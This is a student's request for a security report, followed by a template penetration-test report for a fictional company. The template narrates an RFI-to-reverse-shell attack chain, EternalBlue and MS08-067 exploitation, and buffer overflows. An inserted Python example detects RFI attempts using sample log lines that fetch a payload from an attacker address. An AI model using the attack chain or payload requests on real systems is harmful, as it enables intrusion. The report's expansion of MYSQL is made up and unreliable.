A. T. Still University Fast Tech Corp Security Report

This consumer security grade report has to do with two previous virtual labs I have completed on the command line. I have provided an example of a security example report that should be followed. In this report you should list vulnerabilities that possibly were found and what exactly was found in the two assignments. I will attach the two assignments I have completed so you can base the security report off of those two. I will attach my two assignments that I have done once we have talked. Please read instructions clearly and requirements and follow the template, as I have attached both.

[COMPANY NAME]
Assessment Report
Penetration Test Engagement Report for:
Company Name
Table of Contents
1 Background ..... 4
2 Executive Summary ..... 5
2.1 Summary of Events ..... 5
2.2 Findings Overview ..... 5
2.3 Overall Observations ..... 7
2.4 Noted Strengths ..... 7
3 Vulnerability Report ..... 8
3.1 Findings Summary ..... 8
3.2 Detailed Findings ..... 9
3.3 Severity Rating Criteria ..... 10
4 Attack Path Replication ..... 11
4.1 Initial Access ..... 11
5 Remediation Plan ..... 12
Appendix A: Systems & Services Chart ..... 13
Appendix B: Acronyms ..... 14
Figures List
Figure 1: Assessment Logistics ..... 4
Figure 2: COMPANY Assessment Environment ..... 5
Figure 3: Vulnerabilities by System ..... 6
Figure 4: Findings by Severity ..... 6
Figure 5: Findings Summary ..... 8
Figure 6: RFI Attack ..... 9
Figure 7: System Privilege on the Web Server ..... 10
Figure 8: Overwritten EIP ..... 11
Figure 9: Windows XP Discovery ..... 12
Figure 10: Cleartext Passwords from the Customer Information Database ..... 13
Figure 11: Successful MS17-010 / EternalBlue Exploitation ..... 14
Figure 12: Administrative Password Reuse to Access UbuntuServer11 ..... 15
Figure 13: Verbose Error ..... 16
Figure 14: Username Enumeration ..... 17
Figure 15: Web Directory Script Availability ..... 18
Figure 16: Test Request from Server to Attacker ..... 11
Figure 17: Elevated Access on Dedicated Web Server ..... 21
Figure 18: Malicious User Creation ..... 21
Figure 19: RDP Access to the Dedicated Web Server ..... 22
Figure 20: Cleartext Root MYSQL Credentials ..... 23
Figure 21: Establishing Sessions & Routes with Meterpreter ..... 23
Figure 22: NetEnum Host Discovery ..... 24
Figure 23: Access Log Host Discovery ..... 24
Figure 24: Python Server Access Script ..... 25
Figure 25: Successful MS08-067 Exploit ..... 26
Figure 26: Customer Information Test Server ..... 26
Figure 27: Buffer Overflow Vulnerability Found ..... 27
Figure 28: EIP Offset Discovery ..... 27
Figure 29: Final & Operational Buffer Overflow ..... 28
Figure 30: Proof of Concept Execution of Overflow Exploit ..... 29
Figure 31: Initial DMZ Server Scan ..... 30
Figure 32: Vulnerable Kernel & GCC Version ..... 30
1 Background
OPERATOR conducted a black-box penetration test at the behest of COMPANY. The specific
logistics for this engagement are provided below in Figure 1:

COMPANY Testing Details
Customer:            COMPANY
Assessor:            OPERATOR
Assessment Dates:    XXX – XXX
Assessment Scope:    COMPANY Corporate Network  1.2.3.0/24
                     COMPANY DMZ                2.3.4.0/24
                     Dedicated Web Server       3.4.5.6
Assessment Location: Remote
Domain:              COMPANY.com
                     Intranet.COMPANY.com
Figure 1: Assessment Logistics
This assessment followed a model that emulated an external adversary using realistic attack
techniques and sophisticated tradecraft. It used a Black Box testing scenario, in which the
assessor had no prior knowledge of the organization's infrastructure or assets. The purpose of this
assessment was to determine the security posture of COMPANY by discovering and categorizing
vulnerabilities found within the environment. As these vulnerabilities were discovered, the
assessor would attempt to exploit them to determine their overall impact both individually and as
part of an attack chain. The findings, their impact, and the overall attack path from the assessment
are included in this report, along with remediation plans to further secure the COMPANY
environment based on those findings. The scope of the assessment and IP ranges involved can
be found below in Figure 2.
For ease of distribution amongst leadership and team members, this report is formatted so each
section stands individually.
2 Executive Summary
2.1 Summary of Events
By the close of the assessment, the assessor successfully compromised COMPANY's web server,
corporate network, and DMZ. Initial access to the environment was gained via the web server,
which provided a point of ingress to the corporate network once compromised. With this initial
access, the assessor successfully gained control of the other network hosts and used this access to
pivot into and gain administrative access on the DMZ server. The details of the specific
vulnerabilities discovered during the attack replication phase can be found in Section 3, and a full
write-up on the attack path can be found in Section 4.
Figure 2: Fake COMPANY Assessment Environment
2.2 Findings Overview
In addition to the Dedicated Web Server, 6 systems were discovered in the Corporate domain and
one additional server was discovered in the COMPANY DMZ. Both the Dedicated Web Server
and the DMZ server were found to have vulnerabilities, and 3 of the 6 systems in the Corporate
network were deemed vulnerable.
14 notable findings were discovered throughout the course of the assessment, with a large subset
of them residing within the Dedicated Web Server. As the Dedicated Web Server is a public-facing
device, these vulnerabilities provided a large attack footprint for the initial attempts at accessing
the environment.
[Bar chart: Vulnerabilities by System; vertical axis 0 to 7; series: Critical, High, Medium, Low]
Figure 3: Vulnerabilities by System
Across all the vulnerabilities discovered, the majority of them were in the High category when
ranked by severity. Due to this, as vulnerabilities were discovered the impact of their exploitation
was significantly increased, often resulting in administrative or system level access on the
compromised systems.
[Bar chart: Findings by Severity; vertical axis 0 to 8; categories: Critical, High, Medium, Low]
Figure 4: Findings by Severity
2.3 Overall Observations
The issues and configurations abused during the attack replication phase enabled the team to make
several concluding observations to assist COMPANY in identifying their critical areas of risk:
• Web server misconfigurations were pivotal for initial access
• Users and administrators could benefit from education on data hygiene
• Updated patch management would quickly correct several exploitable issues
• Code review for COMPANY homebrew applications could greatly reduce the attack
  surface area
• COMPANY should continue to conduct consistent network audits and assessments to
  reduce issues and take action on assessment findings.
2.4 Noted Strengths
While conducting the assessment, the assessor noted the following technical controls or defensive
measures that prevented or hampered offensive actions:
• JavaScript code validation in place to prevent XSS and SQLi attacks on the Dedicated
  Web Server comment section
• Maintained segmentation of network environments based on their operations (Corporate
  and DMZ)
• Most passwords were difficult to crack and could not be found in general wordlists
3 Vulnerability Report
3.1 Findings Summary
The assessment methodology utilized identified the following findings as exploitable
vulnerabilities during the attack replication phase. Each finding includes a description, supporting
details, and recommended steps for mitigation. The following findings are presented for review,
validation, and remediation as deemed appropriate. The COMPANY team should review the
findings and recommendations for technical weaknesses, shortcomings in processes and
procedures, and systemic weaknesses in overall security posture. See Section 3.3 for definitions
of each level of severity (Critical/High/Medium/Low).
ID   Finding Name                          Criticality
1    Insecure Web Service                  Critical
2    Elevated Service Account Privileges   Critical
3    Application Logic Issue               Critical
4    Unsupported OS or Application         High
5    Cleartext Password Disclosure         High
6    Patch Management                      High
7    Elevated Password Reuse               High
8    Verbose Error Messages                Medium
9    Username Enumeration                  Medium
10   Web Server Directory Listing          Low
Figure 5: Findings Summary
3.2 Detailed Findings
ID: 1
Finding Name: Insecure Web Service
Severity: Critical
Affected System(s): x.x.x.x – \SystemName

Description
The web server is hosting an application or service that contains an exploitable condition. This
could lead to command execution on the host or unauthorized access to other parts of the
application.
Specifically, an RFI (Remote File Inclusion) vulnerability was discovered within the About
Us page of the site. The location= reference in the URL points to a local file, but an attacker
can modify the URL to point to a file on an external server. The external file is then retrieved
and executed by the victim server.

Recommended Mitigation
Ensure that all applications and services hosted on a web server are a necessary business
function and are hardened to prevent unauthorized access or unintended use.

Relevant Screenshot
This screenshot shows the modified URL being requested from the ELS-WINSER2003 server,
resulting in a file being pulled from the attacker's system.
Figure 6: RFI Attack

Security Reference (FCRM, NIST, etc.)
NIST 800-53: CM-6, SI-1
NIST Cybersecurity Framework: PR.IP-1, PR.IP-2

[There would be a detailed finding provided for each finding listed in Figure 5]
3.3 Severity Rating Criteria
Severity   Description

Critical   Critical vulnerabilities pose an immediate and severe risk to the environment because of the
           ease of exploit and potential severe impact. Critical items will be brought to the customer's
           attention immediately.

High       Intruders may be able to exercise full control on the targeted device. Examples include:
           • Easily exploitable vulnerabilities that can lead to complete application, system, or
             network compromise, such as an intruder having the ability to remotely administer
             files on a web server
           • Severe router/firewall/server misconfigurations
           • Worm, Trojan, or backdoor detected
           • Vulnerability that has tools readily available on the Internet to take advantage of it
           • Weak passwords for remote administration and users

Medium     Intruders may be able to exercise some control of the targeted device. Examples include:
           • Disclosure of unauthorized sensitive customer information or user account
             information
           • Ability of an intruder to obtain full read access to corporate confidential information
           • Lack of basic logging and alerting capabilities
           • Antivirus misconfigurations
           • Untrusted networks having access to trusted networks

Low        The vulnerabilities discovered are reported as items of interest but are not normally
           exploitable. Many low items reported by security tools are not included in this report because
           they are often informational, unverified, or of minor risk.
4 Attack Path Replication
The attack path replication section details the thought process and steps taken by the assessor that
led to the compromise of the COMPANY environment. These steps are provided in series to
provide insight into how an attacker could chain different vulnerabilities together to compromise
a target network or system. Only vulnerabilities relevant to the attack path are discussed in this
section; for the full list of discovered vulnerabilities, please see Section 3.
4.1 Initial Access
The scope of the assessment provided two subnets (Corporate and DMZ), and the Dedicated Web
Server. Believing the web server to be the primary junction between the outside world and the
subnets, this was targeted first. Scans were performed with Hostenum[1] and NMAP to fingerprint
open ports and services while the web application was manually inspected. DIRB[2] and NIKTO[3]
were also used to enumerate possible web directories and vulnerabilities.
While combing through the pages of the web site, a PHP reference pointer was seen in the URL
for the About Us page. The assessor tested the exploitability of this reference by modifying the
URL to request a.txt from the attack system to see if it would reach out.
Figure 7: Test Request from Server to Attacker
This verified the existence of an RFI vulnerability. A payload or other malicious file could be
hosted in place of a.txt, and when the malicious URL is entered the web server would access
and execute that file within the context of the web page.
To exploit this, the assessor hosted a PHP reverse shell file[4] that calls back to a listener once
executed. The IP address and port were set within the PHP file, which was then hosted on the
attack server as wrs.php. The netcat[5] listener was established on the attack system to receive the
callback. Then, as this newly hosted file was placed in the URL and the web request was made,
the web server executed the file and spawned a shell to the netcat listener.
[1] http://www.mediafire.com/file/w5vn2d59fygnd5a/host-enum.sh
[2] https://tools.kali.org/web-applications/dirb
[3] https://cirt.net/Nikto2
[4] https://github.com/Dhayalanb/windows-php-reverse-shell
[5] http://netcat.sourceforge.net/
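The RFI finding in Section 3.2 and the access-log evidence in Section 4.1 both turn on one parameter: the About Us page's `location=` value. The following is an added example, not code from the report or from the assessed COMPANY application, showing the defender's side of that finding: the allow-list check that replaces a raw `include($_GET['location'])`, and a scan over web access logs that flags requests whose `location=` value points at a remote host or traverses the file system. The page path `/about.php`, the allow-listed file names and the log lines are all constructed for the example.

```python
"""Added example: allow-list the About Us include target and hunt for RFI
attempts against location= in Apache-style access logs."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed allow-list of files the About Us page may legitimately include.
ALLOWED_INCLUDES = {"about.txt", "team.txt", "history.txt"}

# Schemes/wrappers PHP will open remotely when allow_url_include is enabled.
REMOTE_SCHEMES = re.compile(r"^(https?|ftps?|php|data|expect|file):", re.IGNORECASE)

# Apache combined-log prefix: client, timestamp, request line, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')


def resolve_include(location):
    """Hardened replacement for including $_GET['location'] directly: return
    the local file name only if it is on the allow-list, otherwise None."""
    value = unquote(location or "")
    return value if value in ALLOWED_INCLUDES else None


def classify_location(value):
    """Label a raw location= value as 'remote' (RFI attempt), 'traversal',
    'unknown' (not allow-listed, worth a look) or 'ok'."""
    v = unquote(value)
    if REMOTE_SCHEMES.match(v) or v.startswith("//"):
        return "remote"
    if ".." in v or v.startswith("/") or "\\" in v:
        return "traversal"
    return "ok" if v in ALLOWED_INCLUDES else "unknown"


def scan_access_log(lines):
    """Return (client_ip, verdict, raw_value) for each request carrying a
    location= parameter that is anything other than an allow-listed file."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target, _status = m.groups()
        # parse_qs percent-decodes, so an encoded http%3A%2F%2F is caught too.
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for raw in query.get("location", []):
            verdict = classify_location(raw)
            if verdict != "ok":
                hits.append((client, verdict, raw))
    return hits


# Constructed sample log lines (documentation IPs), not captured from any server.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2020:13:55:36 +0000] "GET /about.php?location=about.txt HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Oct/2020:13:56:01 +0000] "GET /about.php?location=http://198.51.100.7/a.txt HTTP/1.1" 200 40',
    '198.51.100.7 - - [10/Oct/2020:13:57:12 +0000] "GET /about.php?location=http%3A%2F%2F198.51.100.7%2Fwrs.php HTTP/1.1" 200 0',
    '203.0.113.9 - - [10/Oct/2020:13:58:44 +0000] "GET /about.php?location=../../../../windows/win.ini HTTP/1.1" 200 90',
    '203.0.113.5 - - [10/Oct/2020:13:59:02 +0000] "GET /index.php HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for client, verdict, raw in scan_access_log(SAMPLE_LOG):
        print(f"{client:15} {verdict:9} location={raw}")
```

Run against the sample log it reports the two remote fetches (a.txt, then the encoded wrs.php request) and the traversal attempt, while the legitimate about.txt request is silent.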
5 Remediation Plan
It is recommended that the COMPANY security team review the remediation items provided for
each vulnerability discovered within the environment. This information is listed in Section 3.
Through this review, the security team should determine if the remediation can be safely applied
with minimal impact to environment operations, or if any adverse impact to network operations is
worth the risk involved with remediating the vulnerability.
In addition to the findings involved above, the security team should have any users mentioned in
this report create a new password since their previous one may have been exposed. It would be
prudent to use this as an opportunity to ensure new passwords adhere to any password policy put
in place by the COMPANY leadership.
The security team should review the attack path and replay portions of the attack as applicable.
By replicating the attack path, you are generating an opportunity to modify host and network-based
protection mechanisms so they catch attack vectors that may have previously gone by undetected.
If applicable to this environment, it is recommended that a baseline operating system be established
and installed throughout the domain. This combined with a proper patch management plan would
significantly reduce the available attack vectors discovered in this assessment.
If there are any questions, the assessor can be reached at the following:
Assessor's Name
AssessorName@OperatorCompany.com
(123)456-7890
Appendix A: Systems & Services Chart

Host (IP): x.x.x.x \SystemName
  Open Ports: 80, 135, 139, 443, 1025, 3306, 3389
  Services: Apache, msrpc, Netbios-ssn, mysql, ms-wbt-server
  Obtained Access? YES
  Access Type: Reverse Shell (Web Based RFI); RDP (User, Pass)

Host (IP): x.x.x.x \SystemName
  Open Ports: 135, 139
  Services: msrpc, netbios-ssn
  Obtained Access? NO

Host (IP): x.x.x.x \SystemName
  Open Ports: 135, 139, 445
  Services: msrpc, Netbios-ssn, Microsoft-ds
  Obtained Access? YES
  Access Type: Bind Shell (MS08-067)

Host (IP): x.x.x.x \SystemName
  Open Ports: 139, 445
  Services: Netbios-ssn, Microsoft-ds
  Obtained Access? NO

Host (IP): x.x.x.x \SystemName
  Open Ports: 135, 139, 445, 554, 2869, 10243, 49152, 49153, 49154, 49155, 49156, 49157
  Services: msrpc, Netbios-ssn, Microsoft-ds, rtsp, http
  Obtained Access? YES
  Access Type: Bind Shell (MS17-010)

Host (IP): x.x.x.x \SystemName
  Open Ports: 135, 139
  Services: msrpc, netbios-ssn
  Obtained Access? NO

Host (IP): x.x.x.x \SystemName
  Open Ports: 80, 135, 139, 445
  Services: Apache, msrpc, netbios-ssn, Microsoft-ds
  Obtained Access? YES
  Access Type: Reverse Shell (Buffer Overflow)

Host (IP): x.x.x.x \SystemName
  Open Ports: 21, 22
  Services: Vsftpd, OpenSSH
  Obtained Access? YES
  Access Type: SSH (User, Pass)
Appendix B: Acronyms
C2      Command and Control
DIRB    Directory Buster
DMZ     De-Militarized Zone
FTP     File Transfer Protocol
HTTP    HyperText Transfer Protocol
MYSQL   Michael Widenius Structured Query Language
NMAP    Network Mapper
PHP     Personal Home Page
RDP     Remote Desktop Protocol
RFI     Remote File Inclusion
SQLi    Structured Query Language (SQL) Injection
SSH     Secure Shell
URL     Uniform Resource Locator
XP-SP3  Windows XP Service Pack 3
XSS     Cross Site Scripting
TDA – Assignment 5:
Reporting Activity
Assignment 5 objectives:
• You must submit a complete consumer-grade assessment report on your activity.
• Use the provided template to develop your report on activity taken against A3A4.
• Submit your completed report in PDF format by the provided due date.
Completion requires the following:
  o Report meets all repor…